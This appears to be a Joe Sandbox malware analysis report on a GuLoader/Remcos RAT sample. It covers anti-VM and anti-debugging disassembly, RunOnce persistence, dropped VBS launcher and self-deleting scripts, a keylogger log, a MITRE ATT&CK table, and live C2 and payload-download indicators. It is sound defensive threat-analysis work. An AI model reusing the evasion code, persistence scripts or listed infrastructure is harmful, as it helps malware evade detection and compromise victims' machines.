Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\FANEBREREN.EXE\DYKKERDRAGTSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEAMPHITHYRONS
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57DB5 second address: 0000000004F57DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57E05 second address: 0000000004F57C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57C28 second address: 0000000004F57E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000567DB5 second address: 0000000000567DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000567E05 second address: 0000000000567C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000567C28 second address: 0000000000567E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions:

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_04F50C76 rdtsc

0_2_04F50C76

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\FANEBREREN.exe\DYKKERDRAGTSSoftware\Microsoft\Windows\CurrentVersion\RunOnceAMPHITHYRONS
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_04F50C76 rdtsc

0_2_04F50C76

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_04F55BFE LdrInitializeThunk,

0_2_04F55BFE

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5546D mov eax, dword ptr fs:[00000030h]	0_2_04F5546D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5864F mov eax, dword ptr fs:[00000030h]	0_2_04F5864F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5380C mov eax, dword ptr fs:[00000030h]	0_2_04F5380C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F585F7 mov eax, dword ptr fs:[00000030h]	0_2_04F585F7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F579C6 mov eax, dword ptr fs:[00000030h]	0_2_04F579C6
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F573B7 mov eax, dword ptr fs:[00000030h]	0_2_04F573B7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52D7C mov eax, dword ptr fs:[00000030h]	0_2_04F52D7C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58355 mov eax, dword ptr fs:[00000030h]	0_2_04F58355

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'			Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'			Jump to behavior

Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp, logs.dat.17.dr	Binary or memory string: [ Program Manager ]
Source: Fec9qUX4at.exe, 00000011.00000002.487647862.00000000009D7000.00000004.00000020.sdmp	Binary or memory string: Program Managerq
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Registry Run Keys / Startup Folder11	Process Injection12	Masquerading1	Input Capture111	Query Registry1	Remote Services	Input Capture111	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion21	LSASS Memory	Security Software Discovery721	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	System Information Discovery33	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Fec9qUX4at.exe	29%	Virustotal		Browse
Fec9qUX4at.exe	13%	ReversingLabs	Win32.Trojan.Vebzenpak
Fec9qUX4at.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	29%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	13%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458355
Start date:	03.08.2021
Start time:	09:49:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Fec9qUX4at.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/4@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 20.5% (good quality ratio 7.5%) Quality average: 17.8% Quality standard deviation: 27.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, wermgr.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 13.64.90.137, 52.147.198.201, 23.211.4.86, 20.82.209.183, 93.184.221.240, 40.112.88.60, 40.88.32.150, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.54.110.249, 40.126.31.143, 40.126.31.4, 40.126.31.135, 20.190.159.134, 40.126.31.141, 40.126.31.6, 40.126.31.137, 40.126.31.139, 20.49.150.241, 23.203.69.124, 23.203.67.116, 40.126.31.1, 20.190.159.136, 20.190.159.132, 20.190.159.138 Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, cdn.onenote.net.edgekey.net, skypedataprdcoleus15.cloudapp.net, login.live.com, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, www.tm.lg.prod.aadmsa.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, cs11.wpc.v0cdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, cdn.onenote.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:51:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs
09:51:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	LzbZ4T1iV8.exe	Get hash	malicious	Browse
	kGSHiWbgq9.exe	Get hash	malicious	Browse
	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	LzbZ4T1iV8.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	Ordonnance PL-PB39-210706,pdf.exe	Get hash	malicious	Browse	194.5.98.7
	Tzcyxxestkakhuvtmvfdserywturrfjrye.exe	Get hash	malicious	Browse	194.5.98.72
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	PO.exe	Get hash	malicious	Browse	194.5.98.23
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	WzOSphO1Np.exe	Get hash	malicious	Browse	194.5.98.107
	QUOTATION-007222021.exe	Get hash	malicious	Browse	194.5.97.145
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	ORDER407-395.exe	Get hash	malicious	Browse	194.5.98.23
	Bank Copy.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	FATURAA No.072221.exe	Get hash	malicious	Browse	194.5.98.158

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe Download File
Process:	C:\Users\user\Desktop\Fec9qUX4at.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.638949072783339
Encrypted:	false
SSDEEP:	1536:BUS3/zw2m3c39SYeXvmgU2sIMflWub4cL51tY4SQmiPYElZ943ckw2mUS3/:BT/zM3c3bcBsIMfQuDaSZS3ckYT/
MD5:	2046B941817392E3815535FCCB1F39DC
SHA1:	843D243A71131BAF9FBE0FCF4BA129F51EE74C8F
SHA-256:	C0D3DA1CEFD1A979C8B8CE102FD5D3FF090779F72F4D1098EB383CBBB3480BEE
SHA-512:	ECF0B711C41619DCF9073F1CD4C769CC106B04AAEC40881FC11CBF8686989DA512A9C2EE2683A90B99DDDB1F4A762CF4DF512663519BC9035BBC6D0FD90F9571
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 13%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....(.U.................@..........D........P....@..................................:......................................dK..(....p...[..................................................................(... .......\|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs Download File
Process:	C:\Users\user\Desktop\Fec9qUX4at.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	119
Entropy (8bit):	5.094609879657231
Encrypted:	false
SSDEEP:	3:jfF+m8nhvF3mRDWXp5cViE2J5xAIzkiw9igECHM:jFqhv9IWXp+N23ffiijl
MD5:	1198AD996993F1C8082084F3CD83DD3C
SHA1:	A841D5A9CA764F8C58EC10FF368C6BD1637E8929
SHA-256:	59227CBFDE96895E1D019A879F7155EF36FE091AB03BEA825C51D9A8A625D6F2
SHA-512:	AB29D0F0FEB1D196E2218958495B39A327CBA2F921EFAB0EA2C09C8E2D42EF2692021A282EC2987E3998369C1876A083933C37FDC50B3C4A0C769513953FAF13
Malicious:	true
Reputation:	low
Preview:	Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe")

C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs Download File
Process:	C:\Users\user\Desktop\Fec9qUX4at.exe
File Type:	data
Category:	dropped
Size (bytes):	468
Entropy (8bit):	3.5093499207031558
Encrypted:	false
SSDEEP:	12:xQ4lA2++ugypjBQMPURF3Sbx34Q3Dk3Sbx349Hz/0aimi:7a2+SDTzQTkz9Aait
MD5:	903888A33CC9516D5548F046C7D902EC
SHA1:	D654ADD97768AB9E06A2AC428090BE3E2F0512F6
SHA-256:	75E4262158D66A77E7496606D466EA6CF1333BCE20D429F1E066A2935FD77F0A
SHA-512:	B6BED5DEF33123948A338F1AA65D5D69505487FEF121524C575708894699B0D17A1AA4D3F7C6D1F89CB9730A28C9F20292A5E714F3F2CE2E9D515EB763B45751
Malicious:	true
Reputation:	low
Preview:	O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.D.e.s.k.t.o.p.\.F.e.c.9.q.U.X.4.a.t...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.D.e.s.k.t.o.p.\.F.e.c.9.q.U.X.4.a.t...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\Fec9qUX4at.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.353136862680169
Encrypted:	false
SSDEEP:	3:rklKlmuHlKfUFqlDl5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIuFK8Fql55YcIeeDAlybW/G
MD5:	23B5A5F0892EDE3E544D530B672DB71C
SHA1:	675F67E5EF80E1868950B6362B54BF367DDA258E
SHA-256:	64A5071CE344184BECC0650D8D6432E0CB0271BAF633BDA82E337D736B13EB01
SHA-512:	03369524C6F224DEA70E9CDEE92DFD71214E6C3B99EC4FE0B09A7F3D69A4F30D67CC6FB2DA9ECA4ED4A4C7572B8E96131321B9B73AE767491BDE4F4CB045C46F
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.3. .0.9.:.5.1.:.1.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.638949072783339
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Fec9qUX4at.exe
File size:	114688
MD5:	2046b941817392e3815535fccb1f39dc
SHA1:	843d243a71131baf9fbe0fcf4ba129f51ee74c8f
SHA256:	c0d3da1cefd1a979c8b8ce102fd5d3ff090779f72f4d1098eb383cbbb3480bee
